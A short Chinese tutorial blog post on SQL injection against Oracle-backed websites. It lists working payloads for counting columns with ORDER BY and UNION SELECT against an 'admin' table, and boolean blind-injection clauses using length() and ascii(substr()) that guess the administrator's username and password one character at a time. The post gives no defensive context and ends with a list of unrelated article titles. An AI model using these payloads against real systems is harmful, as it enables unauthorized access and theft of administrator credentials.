Oracle注入
2021/9/10 19:06:38
本文主要是介绍Oracle注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
先判断好注入点后
order by 长度
union select 'null',null,null ... from admin 如果在某个地方返回正确了,那么就能在这个注入点注入
推荐看一本书《藏锋者》
字段长度太短的话使用另一种注入方式来注入 在网站后方加入 and (select count(*) from admin)<>0返回正确说明存在该表
判断完成后,再将*换成表名去猜测列名 可以猜测user password等常用列名
and (select count(*) from admin where length(name)>=5)=1 该句用来猜测管理员用户名长度
and (select count(*) from admin where ascii(substr(name,1,1))>=97)=1 ascii用来获取ASCII码值,去判断 97为a
第二个的话改这个数(name,2,1)
判断密码一样是通过把name改成pwd方法一样
这篇关于Oracle注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-10Rakuten 乐天积分系统从 Cassandra 到 TiDB 的选型与实战
- 2025-01-09CMS内容管理系统是什么?如何选择适合你的平台?
- 2025-01-08CCPM如何缩短项目周期并降低风险?
- 2025-01-08Omnivore 替代品 Readeck 安装与使用教程
- 2025-01-07Cursor 收费太贵?3分钟教你接入超低价 DeepSeek-V3,代码质量逼近 Claude 3.5
- 2025-01-06PingCAP 连续两年入选 Gartner 云数据库管理系统魔力象限“荣誉提及”
- 2025-01-05Easysearch 可搜索快照功能,看这篇就够了
- 2025-01-04BOT+EPC模式在基础设施项目中的应用与优势
- 2025-01-03用LangChain构建会检索和搜索的智能聊天机器人指南
- 2025-01-03图像文字理解,OCR、大模型还是多模态模型?PalliGema2在QLoRA技术上的微调与应用